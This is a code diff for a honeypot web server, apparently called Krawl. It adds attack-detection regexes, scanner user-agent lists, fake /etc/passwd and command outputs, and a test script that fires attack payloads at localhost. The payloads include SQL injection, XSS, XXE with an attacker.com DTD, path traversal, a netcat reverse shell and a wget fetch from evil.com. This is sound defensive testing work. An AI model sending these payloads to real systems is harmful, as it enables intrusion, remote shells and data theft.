# Track pages visited by each IP (for good crawler limiting)
self.ip_page_visits: Dict[str, Dict[str, object]] = defaultdict(dict)
# Load suspicious patterns from wordlists
wl = get_wordlists()
self.suspicious_patterns = wl.suspicious_patterns
# Fallback if wordlists not loaded
if not self.suspicious_patterns:
self.suspicious_patterns = [
"bot",
"crawler",
"spider",
"scraper",
"curl",
"wget",
"python-requests",
"scanner",
"nikto",
"sqlmap",
"nmap",
"masscan",
"nessus",
"acunetix",
"burp",
"zap",
"w3af",
"metasploit",
"nuclei",
"gobuster",
"dirbuster",
]
# Load attack patterns from wordlists
self.attack_types = wl.attack_patterns
# Fallback if wordlists not loaded
@@ -84,7 +89,7 @@ class AccessTracker:
"sql_injection": r"('|--|;|\bOR\b|\bUNION\b|\bSELECT\b|\bDROP\b)", "sql_injection": r"('|--|;|\bOR\b|\bUNION\b|\bSELECT\b|\bDROP\b)",
"xss_attempt": r"(<script|javascript:|onerror=|onload=)", "xss_attempt": r"(<script|javascript:|onerror=|onload=)",
"common_probes": r"(wp-admin|phpmyadmin|\.env|\.git|/admin|/config)", "common_probes": r"(wp-admin|phpmyadmin|\.env|\.git|/admin|/config)",
"shell_injection": r"(\||;|`|\$\(|&&)", "command_injection": r"(\||;|`|\$\(|&&)",
} }
# Track IPs that accessed honeypot paths from robots.txt # Track IPs that accessed honeypot paths from robots.txt
@@ -124,23 +129,30 @@ class AccessTracker:
# Parse URL-encoded form data
parsed = urllib.parse.parse_qs(post_data)
# Get credential field names from wordlists
wl = get_wordlists()
username_fields = wl.username_fields
password_fields = wl.password_fields
# Fallback if wordlists not loaded
if not username_fields:
username_fields = [
"username",
"user",
"login",
"email",
"log",
"userid",
"account",
]
if not password_fields:
password_fields = ["password", "pass", "passwd", "pwd", "passphrase"]
for field in username_fields:
if field in parsed and parsed[field]:
username = parsed[field][0]
break
for field in password_fields:
if field in parsed and parsed[field]:
password = parsed[field][0]
@@ -148,12 +160,16 @@ class AccessTracker:
except Exception:
# If parsing fails, try simple regex patterns
wl = get_wordlists()
username_fields = wl.username_fields or ["username", "user", "login", "email", "log"]
password_fields = wl.password_fields or ["password", "pass", "passwd", "pwd"]
# Build regex pattern from wordlist fields
username_pattern = "(?:" + "|".join(username_fields) + ")=([^&\\s]+)"
password_pattern = "(?:" + "|".join(password_fields) + ")=([^&\\s]+)"
username_match = re.search(username_pattern, post_data, re.IGNORECASE)
password_match = re.search(password_pattern, post_data, re.IGNORECASE)
if username_match:
username = urllib.parse.unquote_plus(username_match.group(1))
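The regex fallback in this hunk builds its patterns from the wordlist field names. A minimal standalone sketch of that approach, with the field lists hardcoded here in place of `wl.username_fields` / `wl.password_fields`:

```python
import re
import urllib.parse

# Hardcoded stand-ins for the wordlist-provided field name lists
username_fields = ["username", "user", "login", "email", "log"]
password_fields = ["password", "pass", "passwd", "pwd"]

# Alternation over field names, capturing the value up to the next '&' or whitespace
username_pattern = "(?:" + "|".join(username_fields) + ")=([^&\\s]+)"
password_pattern = "(?:" + "|".join(password_fields) + ")=([^&\\s]+)"

post_data = "username=admin%27+OR+%271%27%3D%271&password=secret"
username_match = re.search(username_pattern, post_data, re.IGNORECASE)
password_match = re.search(password_pattern, post_data, re.IGNORECASE)

# unquote_plus decodes %27 -> ' and '+' -> space
username = urllib.parse.unquote_plus(username_match.group(1))
password = urllib.parse.unquote_plus(password_match.group(1))
print(username)  # admin' OR '1'='1
print(password)  # secret
```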
@@ -213,6 +229,7 @@ class AccessTracker:
user_agent: str = "",
body: str = "",
method: str = "GET",
raw_request: str = "",
):
"""
Record an access attempt.
@@ -226,6 +243,7 @@ class AccessTracker:
user_agent: Client user agent string
body: Request body (for POST/PUT)
method: HTTP method
raw_request: Full raw HTTP request for forensic analysis
"""
# Skip if this is the server's own IP
from config import get_config
@@ -245,7 +263,9 @@ class AccessTracker:
# POST/PUT body attack detection
if len(body) > 0:
# Decode URL-encoded body so patterns can match (e.g., %3Cscript%3E -> <script>)
decoded_body = urllib.parse.unquote(body)
attack_findings.extend(self.detect_attack_type(decoded_body))
is_suspicious = (
self.is_suspicious_user_agent(user_agent)
@@ -286,6 +306,7 @@ class AccessTracker:
is_suspicious=is_suspicious,
is_honeypot_trigger=is_honeypot,
attack_types=attack_findings if attack_findings else None,
raw_request=raw_request if raw_request else None,
)
except Exception:
# Don't crash if database persistence fails
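The decode-before-detect change in this file matters because URL-encoded payloads do not match the raw attack patterns. A self-contained sketch, using simplified stand-ins for the wordlist patterns:

```python
import re
import urllib.parse

# Simplified stand-ins for the wordlist attack patterns used by AccessTracker
attack_types = {
    "sql_injection": r"('|--|;|\bOR\b|\bUNION\b|\bSELECT\b|\bDROP\b)",
    "xss_attempt": r"(<script|javascript:|onerror=|onload=)",
}

def detect_attack_type(payload):
    """Return the attack categories whose pattern matches the payload."""
    return [name for name, pattern in attack_types.items()
            if re.search(pattern, payload, re.IGNORECASE)]

body = "comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
print(detect_attack_type(body))          # [] - encoded payload slips through
decoded_body = urllib.parse.unquote(body)
print(detect_attack_type(decoded_body))  # ['xss_attempt']
```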


@@ -103,6 +103,26 @@ class Wordlists:
def directory_dirs(self):
return self._data.get("directory_listing", {}).get("directories", [])
@property
def directory_listing(self):
return self._data.get("directory_listing", {})
@property
def fake_passwd(self):
return self._data.get("fake_passwd", {})
@property
def fake_shadow(self):
return self._data.get("fake_shadow", {})
@property
def xxe_responses(self):
return self._data.get("xxe_responses", {})
@property
def command_outputs(self):
return self._data.get("command_outputs", {})
@property
def error_codes(self):
return self._data.get("error_codes", [])
@@ -123,6 +143,18 @@ class Wordlists:
def server_headers(self):
return self._data.get("server_headers", [])
@property
def suspicious_patterns(self):
return self._data.get("suspicious_patterns", [])
@property
def username_fields(self):
return self._data.get("credential_fields", {}).get("username_fields", [])
@property
def password_fields(self):
return self._data.get("credential_fields", {}).get("password_fields", [])
@property
def attack_urls(self):
"""Deprecated: use attack_patterns instead. Returns attack_patterns for backward compatibility."""


@@ -1,73 +0,0 @@
#!/usr/bin/env python3
import re
from typing import Optional
from wordlists import get_wordlists
def detect_xss_pattern(input_string: str) -> bool:
if not input_string:
return False
wl = get_wordlists()
xss_pattern = wl.attack_patterns.get("xss_attempt", "")
if not xss_pattern:
xss_pattern = r"(<script|</script|javascript:|onerror=|onload=|onclick=|<iframe|<img|<svg|eval\(|alert\()"
return bool(re.search(xss_pattern, input_string, re.IGNORECASE))
def generate_xss_response(input_data: dict) -> str:
xss_detected = False
reflected_content = []
for key, value in input_data.items():
if detect_xss_pattern(value):
xss_detected = True
reflected_content.append(f"<p><strong>{key}:</strong> {value}</p>")
if xss_detected:
html = f"""
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body {{ font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }}
.success {{ background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }}
h2 {{ color: #155724; }}
p {{ margin: 10px 0; }}
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>We have received your information:</p>
{''.join(reflected_content)}
<p><em>We will get back to you shortly.</em></p>
</div>
</body>
</html>
"""
return html
return """
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }
.success { background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }
h2 { color: #155724; }
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>Your message has been received and we will respond soon.</p>
</div>
</body>
</html>
"""


@@ -1,3 +0,0 @@
#!/bin/env bash
# -s is for silent (no progress bar) | -I is to get the headers | grep is to find only the Server line
curl -s -I http://localhost:5000 | grep "Server:"


@@ -1,20 +0,0 @@
#!/bin/bash
TARGET="http://localhost:5000"
echo "=== Testing Path Traversal ==="
curl -s "$TARGET/../../etc/passwd"
echo -e "\n=== Testing SQL Injection ==="
curl -s -X POST "$TARGET/login" -d "user=' OR 1=1--"
echo -e "\n=== Testing XSS ==="
curl -s -X POST "$TARGET/comment" -d "msg=<script>alert(1)</script>"
echo -e "\n=== Testing Common Probes ==="
curl -s "$TARGET/.env"
curl -s "$TARGET/wp-admin/"
echo -e "\n=== Testing Shell Injection ==="
curl -s -X POST "$TARGET/ping" -d "host=127.0.0.1; cat /etc/passwd"
echo -e "\n=== Done ==="

tests/test_all_attacks.sh

@@ -0,0 +1,338 @@
#!/bin/bash
# Test script for all attack types in Krawl honeypot
# Tests: Path Traversal, XXE, Command Injection, SQL Injection, XSS
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Server configuration
SERVER_URL="${SERVER_URL:-http://localhost:1234}"
SLEEP_TIME="${SLEEP_TIME:-0.5}"
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Krawl Honeypot Attack Test Suite${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${YELLOW}Testing server: ${SERVER_URL}${NC}"
echo ""
# Function to print test header
test_header() {
echo ""
echo -e "${GREEN}[TEST]${NC} $1"
echo "----------------------------------------"
}
# Function to print request info
request_info() {
echo -e "${YELLOW}Request:${NC} $1"
}
# Function to print response
response_info() {
echo -e "${BLUE}Response (first 200 chars):${NC}"
echo "$1" | head -c 200
echo ""
echo ""
}
#############################################
# PATH TRAVERSAL ATTACKS
#############################################
test_header "Path Traversal - /etc/passwd"
request_info "GET /../../../../etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /etc/shadow"
request_info "GET /../../../etc/shadow"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/shadow")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - Windows path"
request_info "GET /..\\..\\..\\windows\\system32\\config\\sam"
RESPONSE=$(curl -s "${SERVER_URL}/..\\..\\..\\windows\\system32\\config\\sam")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - URL encoded"
request_info "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
RESPONSE=$(curl -s "${SERVER_URL}/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /proc/self/environ"
request_info "GET /../../../../proc/self/environ"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../proc/self/environ")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - config file"
request_info "GET /../../config.php"
RESPONSE=$(curl -s "${SERVER_URL}/../../config.php")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMMAND INJECTION ATTACKS
#############################################
test_header "Command Injection - cmd parameter with id"
request_info "GET /test?cmd=id"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - exec parameter with whoami"
request_info "GET /api/search?exec=whoami"
RESPONSE=$(curl -s "${SERVER_URL}/api/search?exec=whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command parameter with ls"
request_info "GET /admin?command=ls -la"
RESPONSE=$(curl -s "${SERVER_URL}/admin?command=ls%20-la")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - pipe with whoami"
request_info "GET /search?q=test|whoami"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test|whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - semicolon with id"
request_info "GET /page?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/page?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - double ampersand with cat"
request_info "GET /view?file=data.txt&&cat /etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/view?file=data.txt&&cat%20/etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command substitution"
request_info "GET /test?\$(whoami)"
RESPONSE=$(curl -s "${SERVER_URL}/test?\$(whoami)")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - backticks"
request_info "GET /test?\`id\`"
RESPONSE=$(curl -s "${SERVER_URL}/test?\`id\`")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - /bin/bash"
request_info "GET /shell?cmd=/bin/bash -c 'id'"
RESPONSE=$(curl -s "${SERVER_URL}/shell?cmd=/bin/bash%20-c%20'id'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - netcat"
request_info "GET /test?cmd=nc -e /bin/sh 192.168.1.1 4444"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=nc%20-e%20/bin/sh%20192.168.1.1%204444")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - wget"
request_info "GET /test?cmd=wget http://evil.com/malware.sh"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=wget%20http://evil.com/malware.sh")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - uname -a"
request_info "GET /info?cmd=uname -a"
RESPONSE=$(curl -s "${SERVER_URL}/info?cmd=uname%20-a")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SQL INJECTION ATTACKS
#############################################
test_header "SQL Injection - single quote"
request_info "GET /user?id=1'"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - OR 1=1"
request_info "GET /login?user=admin' OR '1'='1"
RESPONSE=$(curl -s "${SERVER_URL}/login?user=admin'%20OR%20'1'='1")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - UNION SELECT"
request_info "GET /product?id=1 UNION SELECT username,password FROM users"
RESPONSE=$(curl -s "${SERVER_URL}/product?id=1%20UNION%20SELECT%20username,password%20FROM%20users")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - SQL comment"
request_info "GET /search?q=test'--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test'--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - time-based blind"
request_info "GET /user?id=1' AND SLEEP(5)--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'%20AND%20SLEEP(5)--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - information_schema"
request_info "GET /search?q=1' UNION SELECT table_name FROM information_schema.tables--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=1'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - stacked queries"
request_info "GET /user?id=1; DROP TABLE users--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;%20DROP%20TABLE%20users--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - POST request"
request_info "POST /login with username=admin' OR '1'='1"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/login" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR '1'='1&password=anything")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XXE INJECTION ATTACKS
#############################################
test_header "XXE Injection - file:///etc/passwd"
request_info "POST /api/xml with XXE payload"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/xml" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - external entity"
request_info "POST /api/process with external entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "file:///etc/shadow">
]>
<foo>&bar;</foo>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/process" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - parameter entity"
request_info "POST /api/data with parameter entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/data" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XSS ATTACKS
#############################################
test_header "XSS - script tag"
request_info "POST /api/contact with <script>alert('XSS')</script>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<script>alert(\"XSS\")</script>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - img onerror"
request_info "POST /api/contact with <img src=x onerror=alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"<img src=x onerror=alert(1)>","email":"test@test.com","message":"Test"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - javascript protocol"
request_info "GET /search?q=javascript:alert('XSS')"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=javascript:alert('XSS')")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - svg onload"
request_info "POST /api/comment with <svg onload=alert(1)>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/comment" \
-H "Content-Type: application/json" \
-d '{"comment":"<svg onload=alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - iframe"
request_info "POST /api/contact with <iframe src=javascript:alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<iframe src=javascript:alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMBINED ATTACKS
#############################################
test_header "Combined - Command Injection via SQL parameter"
request_info "GET /user?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Combined - Path Traversal + Command Injection"
request_info "GET /../../../etc/passwd?cmd=cat"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/passwd?cmd=cat")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SUMMARY
#############################################
echo ""
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Test Suite Completed${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${GREEN}All attack types have been tested.${NC}"
echo -e "${YELLOW}Check the server logs for detection confirmations.${NC}"
echo -e "${YELLOW}Check the dashboard at ${SERVER_URL}/test/dashboard for statistics.${NC}"
echo ""
echo -e "${BLUE}To view the dashboard in browser:${NC}"
echo -e " open ${SERVER_URL}/test/dashboard"
echo ""
echo -e "${BLUE}To check attack types via API:${NC}"
echo -e " curl ${SERVER_URL}/test/api/attack-types"
echo ""


@@ -1,78 +0,0 @@
#!/bin/bash
# Test script for SQL injection honeypot endpoints
BASE_URL="http://localhost:5000"
echo "========================================="
echo "Testing SQL Injection Honeypot Endpoints"
echo "========================================="
echo ""
# Test 1: Normal query
echo "Test 1: Normal GET request to /api/search"
curl -s "${BASE_URL}/api/search?q=test" | head -20
echo ""
echo "---"
echo ""
# Test 2: SQL injection with single quote
echo "Test 2: SQL injection with single quote"
curl -s "${BASE_URL}/api/search?id=1'" | head -20
echo ""
echo "---"
echo ""
# Test 3: UNION-based injection
echo "Test 3: UNION-based SQL injection"
curl -s "${BASE_URL}/api/search?id=1%20UNION%20SELECT%20*" | head -20
echo ""
echo "---"
echo ""
# Test 4: Boolean-based injection
echo "Test 4: Boolean-based SQL injection"
curl -s "${BASE_URL}/api/sql?user=admin'%20OR%201=1--" | head -20
echo ""
echo "---"
echo ""
# Test 5: Comment-based injection
echo "Test 5: Comment-based SQL injection"
curl -s "${BASE_URL}/api/database?q=test'--" | head -20
echo ""
echo "---"
echo ""
# Test 6: Time-based injection
echo "Test 6: Time-based SQL injection"
curl -s "${BASE_URL}/api/search?id=1%20AND%20SLEEP(5)" | head -20
echo ""
echo "---"
echo ""
# Test 7: POST request with SQL injection
echo "Test 7: POST request with SQL injection"
curl -s -X POST "${BASE_URL}/api/search" -d "username=admin'%20OR%201=1--&password=test" | head -20
echo ""
echo "---"
echo ""
# Test 8: Information schema query
echo "Test 8: Information schema injection"
curl -s "${BASE_URL}/api/sql?table=information_schema.tables" | head -20
echo ""
echo "---"
echo ""
# Test 9: Stacked queries
echo "Test 9: Stacked queries injection"
curl -s "${BASE_URL}/api/database?id=1;DROP%20TABLE%20users" | head -20
echo ""
echo "---"
echo ""
echo "========================================="
echo "Tests completed!"
echo "Check logs for detailed attack detection"
echo "========================================="


@@ -183,8 +183,118 @@
".git/",
"keys/",
"credentials/"
],
"fake_files": [
{"name": "settings.conf", "size_min": 1024, "size_max": 8192, "perms": "-rw-r--r--"},
{"name": "database.sql", "size_min": 10240, "size_max": 102400, "perms": "-rw-r--r--"},
{"name": ".htaccess", "size_min": 256, "size_max": 1024, "perms": "-rw-r--r--"},
{"name": "README.md", "size_min": 512, "size_max": 2048, "perms": "-rw-r--r--"}
],
"fake_directories": [
{"name": "config", "size": "4096", "perms": "drwxr-xr-x"},
{"name": "backup", "size": "4096", "perms": "drwxr-xr-x"},
{"name": "logs", "size": "4096", "perms": "drwxrwxr-x"},
{"name": "data", "size": "4096", "perms": "drwxr-xr-x"}
] ]
},
"fake_passwd": {
"system_users": [
"root:x:0:0:root:/root:/bin/bash",
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
"bin:x:2:2:bin:/bin:/usr/sbin/nologin",
"sys:x:3:3:sys:/dev:/usr/sbin/nologin",
"sync:x:4:65534:sync:/bin:/bin/sync",
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
"backup:x:34:34:backup:/var/backups:/usr/sbin/nologin",
"mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false",
"sshd:x:109:65534::/run/sshd:/usr/sbin/nologin"
],
"uid_min": 1000,
"uid_max": 2000,
"gid_min": 1000,
"gid_max": 2000,
"shells": ["/bin/bash", "/bin/sh", "/usr/bin/zsh"]
},
"fake_shadow": {
"system_entries": [
"root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::",
"daemon:*:19000:0:99999:7:::",
"bin:*:19000:0:99999:7:::",
"sys:*:19000:0:99999:7:::",
"www-data:*:19000:0:99999:7:::"
],
"hash_prefix": "$6$rounds=656000$",
"salt_length": 16,
"hash_length": 86
},
"xxe_responses": {
"file_access": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>success</status>\n <data>{content}</data>\n</response>"
},
"entity_processed": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>success</status>\n <message>Entity processed successfully</message>\n <entity_value>{entity_value}</entity_value>\n</response>",
"entity_values": [
"fake_entity_content_12345",
"external_entity_processed",
"system_entity_loaded",
"dtd_entity_resolved"
]
},
"error": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>error</status>\n <message>{message}</message>\n</response>",
"messages": [
"External entity processing disabled",
"Entity expansion limit exceeded",
"Security policy violation"
]
},
"default_content": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
},
"command_outputs": {
"id": [
"uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)",
"uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)",
"uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)"
],
"whoami": ["www-data", "nginx", "apache", "webapp", "nobody"],
"uname": [
"Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux",
"Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux",
"Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux"
],
"pwd": [
"/var/www/html",
"/home/webapp/public_html",
"/usr/share/nginx/html",
"/opt/app/public"
],
"ls": [
["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"],
["app.js", "package.json", "node_modules", "public", "views", "routes"],
["index.html", "css", "js", "images", "data", "api"]
],
"cat_config": "<?php\n// Configuration file\n$db_host = 'localhost';\n$db_user = 'webapp';\n$db_pass = 'fake_password';\n?>",
"network_commands": [
"bash: wget: command not found",
"curl: (6) Could not resolve host: example.com",
"Connection timeout",
"bash: nc: command not found",
"Downloaded {size} bytes"
],
"generic": [
"sh: 1: syntax error: unexpected end of file",
"Command executed successfully",
"",
"/bin/sh: {num}: not found",
"bash: command not found"
],
"uid_min": 1000,
"uid_max": 2000,
"gid_min": 1000,
"gid_max": 2000,
"download_size_min": 100,
"download_size_max": 10000
},
"error_codes": [
400,
401,
@@ -353,14 +463,13 @@
}
},
"attack_patterns": {
"path_traversal": "(\\.\\.|%2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)",
"sql_injection": "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)",
"xss_attempt": "(<script|</script|javascript:|onerror=|onload=|onclick=|onmouseover=|onfocus=|onblur=|<iframe|<img|<svg|<embed|<object|<body|<input|eval\\(|alert\\(|prompt\\(|confirm\\(|document\\.|window\\.|<style|expression\\(|vbscript:|data:text/html)",
"lfi_rfi": "(file://|php://|expect://|data://|zip://|phar://|/etc/passwd|/etc/shadow|/proc/self|c:\\\\windows)",
"xxe_injection": "(<!ENTITY|<!DOCTYPE|SYSTEM\\s+[\"']|PUBLIC\\s+[\"']|&\\w+;|file://|php://filter|expect://)",
"ldap_injection": "(\\*\\)|\\(\\||\\(&)",
"command_injection": "(cmd=|exec=|command=|execute=|system=|ping=|host=|&&|\\|\\||;|\\$\\{|\\$\\(|`|\\bid\\b|\\bwhoami\\b|\\buname\\b|\\bcat\\b|\\bls\\b|\\bpwd\\b|\\becho\\b|\\bwget\\b|\\bcurl\\b|\\bnc\\b|\\bnetcat\\b|\\bbash\\b|\\bsh\\b|\\bps\\b|\\bkill\\b|\\bchmod\\b|\\bchown\\b|\\bcp\\b|\\bmv\\b|\\brm\\b|/bin/bash|/bin/sh|cmd\\.exe|/bin/|/usr/bin/|/sbin/)"
},
"server_headers": [
"Apache/2.4.41 (Ubuntu)",
@@ -369,5 +478,46 @@
"cloudflare",
"AmazonS3",
"gunicorn/20.1.0"
],
"suspicious_patterns": [
"bot",
"crawler",
"spider",
"scraper",
"curl",
"wget",
"python-requests",
"scanner",
"nikto",
"sqlmap",
"nmap",
"masscan",
"nessus",
"acunetix",
"burp",
"zap",
"w3af",
"metasploit",
"nuclei",
"gobuster",
"dirbuster"
],
"credential_fields": {
"username_fields": [
"username",
"user",
"login",
"email",
"log",
"userid",
"account"
],
"password_fields": [
"password",
"pass",
"passwd",
"pwd",
"passphrase"
]
}
}
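To see how the broadened `command_injection` wordlist entry behaves, here is a reduced version of it compiled in Python. This is a subset of the full alternation above, kept short for illustration; the real entry also matches many more binaries and paths:

```python
import re

# Reduced subset of the command_injection pattern from the wordlist JSON
command_injection = re.compile(
    r"(cmd=|exec=|command=|&&|\|\||;|\$\(|`|\bwhoami\b|\bid\b|/bin/bash|/bin/sh)",
    re.IGNORECASE,
)

print(bool(command_injection.search("/test?cmd=id")))            # True (cmd= prefix)
print(bool(command_injection.search("host=127.0.0.1; whoami")))  # True (; separator)
print(bool(command_injection.search("/search?q=flowers")))       # False
```

Note the trade-off the full pattern makes: matching bare command names like `id` or `ls` catches more probes but will also flag some benign query strings, which is acceptable for a honeypot that only logs rather than blocks.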